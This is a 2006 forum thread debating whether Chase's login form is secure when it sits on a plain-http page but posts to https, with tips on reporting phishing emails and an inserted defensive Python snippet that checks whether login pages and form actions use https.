However, if you look in the source for their home page, you'll see that the log in form has

action="https://chaseonline.chase.com/siteminderagent/forms/formpost.fcc"

in the form tag.

So, it IS secure.

I get emails all the time that my chase account is insecure, by the way. This proves nothing, especially since I don't even have an account there.

That said, I do think that instead of a login form on an insecure page, they should have a "go here to login" link so that you log in on an https page.
0 Votes
Chase insecurity
progan01@... 1st Jun 2006
In fact I did suggest to the second Chase help rep that a link to a secure page for user logon would help. He said he'd pass the suggestion on. We can all see how that's been ignored.

The Javascript fetch you mention does not preclude spoofing the traffic to that address, which SSL would at least identify as being redirected. It is not a secure logon, no matter what Chase.com says.

As for the phishing attempts you get about your nonexistent Chase.com account, do what I do: Display with full headers, get 'properties' on the link they want you to click, then forward the note AS AN INLINE TEXT MESSAGE ONLY to:

spamATuce.gov (FTC Spam Reporting)
abuseATjpmchase.com (Chase.com spam, phishing, etc.)

with AT replaced by the 'at' symbol, of course.

At the top, note that this is a phishing fraud and that the link in it actually connects to this address, and paste in the real address from the spoofed link you copied.

I also send along the addresses and links within any graphics, but this is optional.

This should reduce your spam traffic. I recommend it heartily, as the people who phish Chase.com have a lot of help from inside the organization -- through simple incompetence or actual malice it's not possible to tell. Treat the witness as hostile.
0 Votes
Are they doing this for convenience?
Mark Miller 2nd Jun 2006
One of the complaints I used to hear about SSL-secured pages is they loaded slowly. This was because all of the page's content was encrypted coming down to the client. I don't know if this made the data blob coming down bigger or not. The browser then had to decrypt it before displaying it. Apparent performance is especially an issue with people who use dial-up connections (which is a minority now, as I understand it).

If you'll remember most login pages used to be SSL-secured right when they loaded. Maybe the reason web designers came up with this way of doing it is so that the login page loads quickly, but still secures the user ID and password information when the user submits it. They weren't thinking about the usefulness of SSL authentication.
0 Votes
SSL performance is now moot
georgeou 2nd Jun 2006
Offloading SSL to a reverse proxy, using a load balancer, or just using a modern server or hardware acceleration makes performance issues moot. SSL doesn't really make pages that much bigger so dialup isn't an issue. This is just pure ignorance on the bank's part.
0 Votes
Login page DOES use SSL
optimist134 1st Jun 2006
Go to www.chase.com, turn off SSL in your browser, and try to login. You can't because SSL is disabled. Some folks seem to be awfully paranoid!
0 Votes
Login page is NOT SSL-protected
progan01@... 1st Jun 2006
The page still transmits your data in the clear. Checking your browser for SSL compatibility does NOT secure the data exchange.

George Ou is right; the page itself is vulnerable to spoofing, whether through a pharmed DNS address or, as I have seen, an actual takeover of the non-protected page. A Houston credit union was the victim of one such phishing attack when the site was down for maintenance. For three hours. Hackers pirated the URL and redirected its traffic to their chosen site as users were bombarded with phishing e-mails. I don't think many other people reported it when it happened.

Identity theft is a multibillion-dollar problem and it is worsening. A lot of criminals count on complacency and user ignorance to steal their information. Chase.com is not helping by removing basic Web security from their login page.

And the next time you tell somebody that burglars can't get in through the window because there's GLASS in the way, maybe you should listen when somebody tells you to make sure the sash is locked.
0 Votes
absolutely right you are...
suirauqa 1st Jun 2006
progan01. Even the new chase credit card log-on page is not secure, and the page does not even have a link for a secure log-on. Only those who know can choose to log in from a secure page by typing in: chaseonline.chase.com which takes you to a secure log-on page. I don't really understand the logic (or the lack thereof) behind not providing a secure log-on to the customer in the name of customer convenience(!!!).
0 Votes
And - Chase TRICKS you!
xrayman 1st Jun 2006
Chase even has the GALL of putting a lock icon next to the sign-in form boxes. This is to make up for the fact that the page doesn't have an "official" SSL lock icon. To me, this is horrible.

They also have a "Security Center" which tells you that "most" forms are encrypted and then goes on to tell people what to look for to know you're on a secure site (the lock icon and https).
http://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/shared/assets/page/security_measures#2

The FAKE "lock icon" next to the boxes is an insult.
0 Votes
And here's proof of the trick!
xrayman 1st Jun 2006
Chase puts an "unofficial" lock icon next to their sign-in boxes to FOOL you that it's secure. Take a look:
http://www.chase.com
In case they decide to remove it due to the outcry, here's a screenshot I just took from my own computer:
http://aycu22.webshots.com/image/1621/1084403799961796862_rs.jpg
0 Votes
The submit button performs a POST to HTTPS://chaseonline.chase.com.

Looks like the actual send of the logon credentials is SSL protected to me.

"action="https://chaseonline.chase.com/siteminderagent/forms/formpost.fcc"

--MG
0 Votes
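The point argued back and forth in this thread (a login form delivered over plain http whose action posts to https) can be checked mechanically. The following is an added example, not code from any poster or from Chase: it parses a page, finds every form with a password field, and reports whether both the page and the action use https. The sample page is constructed here, modelled on the form tag quoted above.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class LoginFormFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.forms = []    # one dict per form: {"action": ..., "has_password": ...}
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form and (a.get("type") or "").lower() == "password":
            self._form["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def audit_login_forms(page_url, html):
    """Return (action_url, verdict) for every form on the page that asks for a password.
    Credentials are protected end to end only when BOTH the page and the form action
    use https: a page fetched over plain http can have its action attribute (or the
    padlock image beside the boxes) rewritten in transit or on a compromised server.
    """
    finder = LoginFormFinder()
    finder.feed(html)
    page_https = urlsplit(page_url).scheme == "https"
    findings = []
    for form in finder.forms:
        if not form["has_password"]:
            continue
        action = urljoin(page_url, form["action"])    # empty action posts back to the page
        action_https = urlsplit(action).scheme == "https"
        if page_https and action_https:
            verdict = "ok"
        elif action_https:
            verdict = "page-not-https"    # the pattern debated in the thread
        else:
            verdict = "cleartext-post"
        findings.append((action, verdict))
    return findings


# Constructed sample page, modelled on the form tag quoted in the thread.
SAMPLE_HTML = """<form action="https://chaseonline.chase.com/siteminderagent/forms/formpost.fcc" method="post">
<input type="text" name="USER"><input type="password" name="PASSWORD"></form>
<form action="/search"><input type="text" name="q"></form>"""
```

Run against the sample with a page URL of http://www.chase.com/ it reports "page-not-https" for the login form and ignores the search form; with the page itself served from https://chaseonline.chase.com/ the same form reports "ok".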
Right you are, xrayman
progan01@... 2nd Jun 2006
But what appalled me was that the Chase.com tech insisted that the presence of that icon alone guaranteed my security. When I told him that anyone could put a lock icon onto a page, he was at a loss.

Chase therefore is not only tricking its customers, but deliberately providing false and misleading information to their technical reps. I'd say that was clear and convincing evidence of a deliberate attempt to mislead everyone as to the lack of Chase security, wouldn't you?

Obviously they know their site isn't secure. Obviously they think obscuring their own staff will keep people ignorant about Web security. The question I must ask is, Who at Chase profits from such ignorance, confusion and misdirection? At some point, you must admit, the people who profit from such a policy have interests opposed to those of their customers, the users of the Web, and the institution of banking itself.

I call them criminal, and I call for their removal by any means necessary. This isn't just stupidity. It's an attack. It demands a strong and visible response. Public, devastating and LOUD.
0 Votes
Solution: SARBANES OXLEY
thegestunkenaraygun 9th Jun 2006
I know that the banking industry is usually subject to its own regulatory regime, but SOX has got to be in the minds of the auditors. It's a pain in the butt, but making top management personally liable when material defects in the controls over financial accounting are identified and not addressed is a big incentive to fix this kind of stuff.
